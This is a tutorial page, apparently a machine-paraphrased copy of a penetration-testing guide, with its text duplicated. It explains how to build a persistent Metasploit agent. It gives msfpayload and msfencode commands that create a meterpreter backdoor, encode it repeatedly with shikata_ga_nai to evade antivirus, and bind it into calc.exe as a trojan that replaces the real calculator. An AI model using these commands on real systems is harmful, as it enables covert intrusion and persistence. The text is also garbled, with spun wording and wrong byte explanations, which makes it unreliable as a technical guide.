Let's discuss Create persistent agent using Metasploit? Metasploit Framework additionally used to create a stand-alone executable that may persist on a compromised system and permit interactive communications. Benefit to create persistent agent utilizing metasploit is that it may be ready and examined prematurely to make sure connectivity and encoded to bypass native antivirus software program.
Create persistent agent using Metasploit
To make a easy stand-alone agent, launch msfconsole on a command immediate in Kali.
Use msfpayload to craft the persistence agent. Within the instance proven within the following screenshot, the agent is configured to make use of a reverse_tcp shell that may hook up with the native host at 192.168.forty three.a hundred thirty on port 4444. The agent, named attack1.exe, will use a win32 executable template.
The stand-alone agent will solely work on compromised techniques with no antivirus put in, or if the antivirus has first been disabled utilizing the suitable meterpreter command. To bypass the antivirus, the backdoor should be encoded. There are a number of totally different choices for encoding the payload, as proven within the following screenshot:
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6851151556093185"
data-ad-slot="4254333841">
To see the accessible choices, use the present encoders command.
Metasploit makes use of roughly 30 completely different encoders; by default, it is going to choose essentially the most acceptable encoder if one just isn't specified.
An excellent common encoder to make use of is shikata_ga_nai. This encoder implements polymorphic XOR additive suggestions encoding in opposition to a four-byte key, and it's the solely encoder ranked as "wonderful" by Metasploit.
To encode the beforehand ready assault.exe agent, we use the next command:
This encodes the assault.exe agent 5 instances utilizing the shikata_ga_nai protocol. Every time it's re-encoded, it turns into tougher to detect. Nevertheless, the executable additionally will increase in dimension. The total payload will be created straight from the command line in Kali. Not solely can it's encoded, however we are able to configure the encoding sample to keep away from sure characters. For instance, the next characters ought to be prevented when encoding a persistent agent as a result of they could lead to discovery and failure of the assault:
To create a multiencoded payload, use the next command:
You may as well encode msfpayload to an present executable, and each the modified executable and the persistent agent will perform. To bind the persistent agent to an executable resembling a calculator (calc.exe), first copy the suitable calc.exe file into Metasploit's template folder positioned at /usr/share/metasploit-framework/ knowledge/templates. When the template is in place, use the next command:
The agent could be positioned on the goal system, renamed calc.exe to switch the unique calculator, after which executed.
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6851151556093185"
data-ad-slot="4254333841">
Sadly, practically all Metasploit-encoded executables could be detected by shopper antivirus software program. This has been attributed to penetration testers who've submitted encrypted payloads to websites corresponding to VirusTotal. Nevertheless, you possibly can create an executable after which encrypt it utilizing Veil-Evasion,
Create persistent agent using Metasploit
To make a easy stand-alone agent, launch msfconsole on a command immediate in Kali.
Use msfpayload to craft the persistence agent. Within the instance proven within the following screenshot, the agent is configured to make use of a reverse_tcp shell that may hook up with the native host at 192.168.forty three.a hundred thirty on port 4444. The agent, named attack1.exe, will use a win32 executable template.
The stand-alone agent will solely work on compromised techniques with no antivirus put in, or if the antivirus has first been disabled utilizing the suitable meterpreter command. To bypass the antivirus, the backdoor should be encoded. There are a number of totally different choices for encoding the payload, as proven within the following screenshot:
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6851151556093185"
data-ad-slot="4254333841">
To see the accessible choices, use the present encoders command.
Metasploit makes use of roughly 30 completely different encoders; by default, it is going to choose essentially the most acceptable encoder if one just isn't specified.
An excellent common encoder to make use of is shikata_ga_nai. This encoder implements polymorphic XOR additive suggestions encoding in opposition to a four-byte key, and it's the solely encoder ranked as "wonderful" by Metasploit.
To encode the beforehand ready assault.exe agent, we use the next command:
msf>msfencode -i assault.exe -o encoded_attack.exe -e x86/shikata_ga_nai -c 5 -t exe
This encodes the assault.exe agent 5 instances utilizing the shikata_ga_nai protocol. Every time it's re-encoded, it turns into tougher to detect. Nevertheless, the executable additionally will increase in dimension. The total payload will be created straight from the command line in Kali. Not solely can it's encoded, however we are able to configure the encoding sample to keep away from sure characters. For instance, the next characters ought to be prevented when encoding a persistent agent as a result of they could lead to discovery and failure of the assault:
- \x00 represents a zero-byte deal with
- \xa0 represents a line feed
- \xad represents a carriage return
To create a multiencoded payload, use the next command:
msf>msfpayload home windows/meterpreter/bind_tcp LPORT=444 R| msfencode -e x86/shikata_ga_nai -c 5 -t uncooked -a x86 -b '\x00\x0a\x0d' -c 5 -x /root/Desktop/assault.exe -o /root/Desktop/encoded_attack.exe
You may as well encode msfpayload to an present executable, and each the modified executable and the persistent agent will perform. To bind the persistent agent to an executable resembling a calculator (calc.exe), first copy the suitable calc.exe file into Metasploit's template folder positioned at /usr/share/metasploit-framework/ knowledge/templates. When the template is in place, use the next command:
msf>msfpayload home windows/meterpreter/bind_tcp LPORT=444 R| msfencode -t exe -x calc.exe -okay -o encoded_calc_attack.exe -e x86/shikata_ga_nai -c 5
The agent could be positioned on the goal system, renamed calc.exe to switch the unique calculator, after which executed.
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6851151556093185"
data-ad-slot="4254333841">
Sadly, practically all Metasploit-encoded executables could be detected by shopper antivirus software program. This has been attributed to penetration testers who've submitted encrypted payloads to websites corresponding to VirusTotal. Nevertheless, you possibly can create an executable after which encrypt it utilizing Veil-Evasion,
COMMENTS